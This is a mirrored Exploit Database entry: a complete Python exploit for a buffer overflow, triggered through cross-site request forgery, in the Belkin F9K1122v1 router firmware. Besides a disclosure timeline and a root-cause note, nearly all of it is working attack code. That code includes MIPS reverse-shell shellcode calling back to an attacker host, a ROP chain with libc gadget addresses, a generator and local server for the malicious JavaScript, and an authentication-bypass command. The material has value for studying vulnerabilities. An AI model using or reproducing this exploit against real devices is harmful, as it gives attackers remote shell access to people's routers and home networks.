Belkin F9K1122v1 1.00.30 – Buffer Overflow (via Cross-Site Request Forgery)

• Exploit Database
• 129 阅读

• 作者： b1ack0wl
  日期： 2016-09-04
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40332/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267

  import socket, sys , base64, struct, string, urllib from getopt import getopt as GetOpt, GetoptError from uuid import getnode as get_mac import SimpleHTTPServer, SocketServer     # TIMELINE # &apos;&apos;&apos; 3/16/2016 - First Submission to Belkin [no response] 5/3/2016 - Second Submission to Belkin [no response] 6/4/2016 - Notification of 0day [vendor responded] Vendor Response: Our email system was broken but we want another 90 days. 9/3/2016 - Notification of 0day sent to Belkin. [no response] 9/4/2016 - The second 90 day extension is over. &apos;&apos;&apos;     # Root cause analysis and all of that fun stuff &apos;&apos;&apos; This is the CSRF PoC. You will need to embed your JS soruce somewhere. &apos;<script src=//ip.addr/a.js>&apos; The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible. XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs. There is no protection against CSRFs so I made this CSRF PoC.     The BoF Vulnerability:   File Name: fmmgmt.c ------------------------------------------------------------- void formSetLanguage(webs_t wp, char_t *path, char_t *query) { [CUT] ... if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){ strcpy(tmpbuf, T("Set WEB language error!")); goto setErr; } apmib_update(CURRENT_SETTING); setErr: urltmp = websGetVar(wp, T("webpage"), T("")); sprintf(tmpbuf, "/%s", urltmp); -------------------------------------------------------------   In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!   ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable. &apos;&apos;&apos;     # GREETZ &apos;&apos;&apos; @AustinHackers - I love you all <3 @Laughing_Mantis - Cause I said I would! @MisterCh0c - Keep on h4x0ring IoT products! @IoTVillage - You guys rock! @HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D @avicoder - cause you&apos;re awesome! :D @TheZDI - If it weren&apos;t for your comment of wanting me to bypass auth then I wouldn&apos;t of found these vulns.   Everyone over at Praetorian - You guys are awesome <3. &apos;&apos;&apos;     def usage(): print "" print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]" print "By: Elvis Collado [b1ack0wl]" print "" print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0] print "" print "\t-s Connect back IP [LHOST]" print "\t-d Destination IP of Socket Listener [RHOST]" print "\t-h Print this Help Menu" print "" sys.exit(1)     # Hacky but whatever it gets the point across. if len(sys.argv) < 3: usage()   try: (opts, args) = GetOpt(sys.argv[1:], &apos;s:d:h&apos;) except GetoptError, e: usage() for opt, arg in opts: if opt == "-s": connectback_ip = arg.split(".") for a in connectback_ip: if int(a) == 0: print "IP cannot have NULL Bytes :(" sys.exit(1) IP_1= struct.pack("<B",int(connectback_ip[0])) IP_2= struct.pack("<B",int(connectback_ip[1])) IP_3= struct.pack("<B",int(connectback_ip[2])) IP_4= struct.pack("<B",int(connectback_ip[3])) elif opt == "-d": host = arg elif opt == "-h": usage()     # Shellcode from bowcaster.   shellcode = string.join([ "\x24\x0f\xff\xfa", # li t7,-6 "\x01\xe0\x78\x27", # nor t7,t7,zero "\x21\xe4\xff\xfd", # addi a0,t7,-3 "\x21\xe5\xff\xfd", # addi a1,t7,-3 "\x28\x06\xff\xff", # slti a2,zero,-1 "\x24\x02\x10\x57", # li v0,4183 "\x01\x01\x01\x0c", # syscall 0x40404 "\xaf\xa2\xff\xff", # sw v0,-1(sp) "\x8f\xa4\xff\xff", # lw a0,-1(sp) "\x34\x0f\xff\xfd", # li t7,0xfffd "\x01\xe0\x78\x27", # nor t7,t7,zero "\xaf\xaf\xff\xe0", # sw t7,-32(sp)   # Port 8080 "\x3c\x0e\x1f\x90", # lui t6,0x1f90 "\x35\xce\x1f\x90", # ori t6,t6,0x1f90 # Store Port "\xaf\xae\xff\xe4", # sw t6,-28(sp)   # Big endian IP address 192.168.206.2 "\x3c\x0e"+IP_1+IP_2, # lui t6,0x7f01 "\x35\xce"+IP_3+IP_4, # ori t6,t6,0x101   "\xaf\xae\xff\xe6", # sw t6,-26(sp)   "\x27\xa5\xff\xe2", # addiu a1,sp,-30 "\x24\x0c\xff\xef", # li t4,-17 "\x01\x80\x30\x27", # nor a2,t4,zero "\x24\x02\x10\x4a", # li v0,4170 "\x01\x01\x01\x0c", # syscall 0x40404 "\x24\x0f\xff\xfd", # li t7,-3 "\x01\xe0\x78\x27", # nor t7,t7,zero "\x8f\xa4\xff\xff", # lw a0,-1(sp) "\x01\xe0\x28\x21", # move a1,t7 "\x24\x02\x0f\xdf", # li v0,4063 "\x01\x01\x01\x0c", # syscall 0x40404 "\x24\x10\xff\xff", # li s0,-1 "\x21\xef\xff\xff", # addi t7,t7,-1 "\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop> "\x28\x06\xff\xff", # slti a2,zero,-1 "\x3c\x0f\x2f\x2f", # lui t7,0x2f2f "\x35\xef\x62\x69", # ori t7,t7,0x6269 "\xaf\xaf\xff\xec", # sw t7,-20(sp) "\x3c\x0e\x6e\x2f", # lui t6,0x6e2f "\x35\xce\x73\x68", # ori t6,t6,0x7368 "\xaf\xae\xff\xf0", # sw t6,-16(sp) "\xaf\xa0\xff\xf4", # sw zero,-12(sp) "\x27\xa4\xff\xec", # addiu a0,sp,-20 "\xaf\xa4\xff\xf8", # sw a0,-8(sp) "\xaf\xa0\xff\xfc", # sw zero,-4(sp) "\x27\xa5\xff\xf8", # addiu a1,sp,-8 "\x24\x02\x0f\xab", # li v0,4011 "\x01\x01\x01\x0c"# syscall 0x40404 ], &apos;&apos;)         # getRect() son huge_string = "IMETHANBRADBERRY " * 6 # I was watching A LOT of Youtube at the time. So I made my padding "IMETHANBRADBERRY" cause it made me lol. :D huge_string += "!" # Filler huge_string += struct.pack(">L", 0x2aaf2c80) # s0 Function to LIBC Sleep huge_string += "\x43\x43\x43\x43" # s1 but after sleep it&apos;s just padding huge_string += struct.pack(">L",0x2aafc840) # RA OverWrite # move t9,s0 jalr t9 huge_string += "\x44\x44\x44\x44" * 6 # padding huge_string += struct.pack(">L",0x31313131) # s0 -Sleep huge_string += struct.pack(">L",0x2aafc840) # s1 huge_string += struct.pack(">L",0x34343434) # s2 huge_string += struct.pack(">L",0x2aaf9f38) # Second Rop Chain RA huge_string += "\x45\x45\x45\x45" * 9 # Padding huge_string += struct.pack(">L",0x2aaf9808) # Third ROP Chain RA huge_string += "\x46\x46\x46\x46" * 10 huge_string += struct.pack(">L",0x2739e8b8) # Hacky NOP Sled YoloSwagSecurity(tm) Style :D huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2aaf97fc) # Fourth ROP Chain (Stack Exec). $PC will point to the Hacky NOP Sled. huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += struct.pack(">L",0x2739e8b8) huge_string += "\x47\x47\x47\x47" # Padding becomes NULL huge_string += shellcode # shellcode start     &apos;&apos;&apos;   NOTES   libc = 0x2aad0000   0x2aafc840 (Sleep)   Gadget 1   0x2aafc840: movet9,s0 # Sleep 0x2aafc844: jalrt9 # call sleep. The rest of the instructions will not block out payload and are not included.   Gadget 2   0x2aaf9f38: movet9,s1 # Addr to Gadget 3 0x2aaf9f3c: lwra,52(sp) 0x2aaf9f40: lws3,48(sp) 0x2aaf9f44: lws2,44(sp) 0x2aaf9f48: lws1,40(sp) 0x2aaf9f4c: lws0,36(sp) 0x2aaf9f50: jrt9 # Call Gadget 3       Gadget 3   0x2aaf9808: addiu a0,sp,24 # Add offet +24 to SP and store it in A0 0x2aaf980c: lwra,52(sp) # load Ret addr 0x2aaf9810: jrra # ret       Gadget 4 (Stack Exec)   0x2aaf97fc: movet9,a0 # move A0 which contains the address of the stack 0x2aaf9800: swv0,24(sp) 0x2aaf9804: jalrt9 # Jump to the stack 0x2aaf9808: addiu a0,sp,24 # Before jumping, add +24 to the stack and store it in A0   &apos;&apos;&apos;     csrf_file = open(&apos;a.js&apos;, &apos;wb&apos;) params = urllib.urlencode({&apos;webpage&apos;: huge_string}) # Vulnerable parameter destination_addr = &apos;x.open("POST", "http://&apos; + host + &apos;/goform/formSetLanguage"&apos; + &apos;,true);\n&apos; # Vulnerable Endpoint that does not require authentication   # Write CSRF PoC csrf_file.write(&apos;function getrekt(){&apos;) csrf_file.write(&apos;var x = new XMLHttpRequest();\n&apos;) csrf_file.write(destination_addr) csrf_file.write(&apos;x.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); \n&apos;) csrf_file.write(&apos;x.send("&apos; + params + &apos;");&apos;) csrf_file.write(&apos;}\ngetrekt();&apos;)   # Close file since we&apos;re doing writing to it. csrf_file.close()     # Now Host the CSRF File mac = get_mac() PORT = 80 # This is why superuser rights are needed Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", PORT), Handler) mac_addr = &apos;:&apos;.join(("%012X" % mac)[i:i+2] for i in range(0, 12, 2)) print "[\033[1;32m+\033[0m] Serving CSRF File on port:", PORT print "[\033[1;32m+\033[0m] Copy the following string to bypass HTTPd authentication: \033[1;33m" + "echo \"" + mac_addr.lower() + "\" > /var/remote_mac_addr\033[0m" httpd.serve_forever()